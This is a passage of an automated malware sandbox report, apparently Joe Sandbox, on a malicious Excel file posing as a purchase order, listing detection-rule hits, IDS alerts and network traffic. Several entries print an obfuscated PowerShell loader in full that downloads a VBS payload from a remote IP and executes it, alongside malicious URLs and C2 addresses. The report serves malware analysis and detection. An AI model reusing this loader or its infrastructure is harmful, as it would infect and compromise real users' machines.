GhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , ProcessId: 4044, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJ
odHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", ProcessId: 3920, ProcessName: csc.exe
        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.150.207.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3716, TargetFilename: C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS
        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 54.150.207.131, SourceIsIpv6: false, SourcePort: 443
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , ProcessId: 4044, ProcessName: wscript.exe
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3716, TargetFilename: C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline
        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3312, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", CommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; 
inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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
        Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3716, TargetFilename: C:\Users\user\AppData\Local\Temp\csdhpuz4.egi.ps1

        Data Obfuscation

        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm
9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", ProcessId: 3920, ProcessName: csc.exe
        Timestamp                        SID      Severity  Classtype                      Source IP       Source Port  Destination IP  Destination Port  Protocol
        2024-12-10T06:57:45.530721+0100  2024197  1         A Network Trojan was detected  172.245.142.60  80           192.168.2.22    49164             TCP
        2024-12-10T06:57:50.179073+0100  2024197  1         A Network Trojan was detected  172.245.142.60  80           192.168.2.22    49166             TCP
        2024-12-10T06:57:45.530608+0100  2024449  1         Attempted User Privilege Gain  192.168.2.22    49164        172.245.142.60  80                TCP
        2024-12-10T06:57:50.178973+0100  2024449  1         Attempted User Privilege Gain  192.168.2.22    49166        172.245.142.60  80                TCP
        2024-12-10T06:58:13.226642+0100  2024449  1         Attempted User Privilege Gain  192.168.2.22    49173        172.245.142.60  80                TCP
        2024-12-10T06:58:33.137505+0100  2049038  1         A Network Trojan was detected  151.101.1.137   443          192.168.2.22    49174             TCP
        2024-12-10T06:57:58.219043+0100  2858795  1         A Network Trojan was detected  192.168.2.22    49167        172.245.142.60  80                TCP

        AV Detection

        Source: https://short.ruksk.com/BK Avira URL Cloud: Label: malware
        Source: https://short.ruksk.com/der Avira URL Cloud: Label: malware
        Source: https://short.ruksk.com/I Avira URL Cloud: Label: malware
        Source: https://short.ruksk.com/ILE Avira URL Cloud: Label: malware
        Source: https://short.ruksk.com/ Avira URL Cloud: Label: malware
        Source: https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&ge Avira URL Cloud: Label: malware
        Source: https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift Avira URL Cloud: Label: malware
        Source: https://short.ruksk.com/3v Avira URL Cloud: Label: malware
        Source: Orden_de_Compra_Nmero_6782929219.xls, ReversingLabs: Detection: 13%
        Source: Orden_de_Compra_Nmero_6782929219.xls, Virustotal: Detection: 14%
        Source: Orden_de_Compra_Nmero_6782929219.xls, Joe Sandbox ML: detected

        Phishing

        Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].hta, type: DROPPED
        Source: unknown, HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: unknown, HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49171 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49172 version: TLS 1.2
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.pdb source: powershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.pdb source: powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.pdbhP source: powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.pdbhP source: powershell.exe, 00000007.00000002.444981624.00000000030D9000.00000004.00000800.00020000.00000000.sdmp

        Software Vulnerabilities

        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\mshta.exe
        Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global traffic, DNS query: name: short.ruksk.com
        Source: global traffic, DNS query: name: res.cloudinary.com
        Source: global traffic, DNS query: name: paste.ee
        Source: global traffic, TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global traffic, TCP traffic: 192.168.2.22:49169 -> 54.150.207.131:443
        Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global traffic, TCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global traffic, TCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global traffic, TCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 172.245.142.60:80
        Source: global traffic, TCP traffic: 192.168.2.22:49173 -> 172.245.142.60:80
        Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
